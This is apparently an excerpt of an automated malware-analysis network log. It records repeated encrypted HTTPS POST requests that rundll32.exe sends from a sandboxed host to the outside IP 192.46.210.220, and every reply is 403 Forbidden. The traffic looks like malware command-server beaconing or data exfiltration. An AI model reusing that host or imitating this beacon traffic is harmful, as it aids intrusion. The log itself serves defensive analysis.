                                                                                                        2021-10-28 02:47:24 UTC343OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:24 UTC347INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:24 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        7192.168.2.549784192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:20 UTC34OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:20 UTC34OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:21 UTC44INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:20 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        70192.168.2.550079192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:26 UTC348OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:26 UTC348OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:27 UTC352INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:26 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        71192.168.2.550085192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:28 UTC352OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:28 UTC353OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:28 UTC357INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:28 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        72192.168.2.550090192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:30 UTC357OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:30 UTC358OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:30 UTC362INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:30 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        73192.168.2.550094192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:31 UTC362OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:31 UTC363OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:32 UTC367INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:32 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        74192.168.2.550098192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:34 UTC367OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:34 UTC368OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:34 UTC372INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:34 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        75192.168.2.550102192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:35 UTC372OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:35 UTC372OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:36 UTC377INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:36 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        76192.168.2.550106192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:38 UTC377OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:38 UTC377OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:38 UTC382INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:38 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        77192.168.2.550110192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:39 UTC382OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:39 UTC382OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:40 UTC387INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:40 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        78192.168.2.550114192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:41 UTC387OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:41 UTC387OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:42 UTC392INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:42 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        79192.168.2.550118192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:43 UTC392OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:43 UTC392OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:44 UTC397INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:44 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        8192.168.2.549785192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:20 UTC39OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:20 UTC39OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:21 UTC44INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:21 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        80192.168.2.550122192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:45 UTC397OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
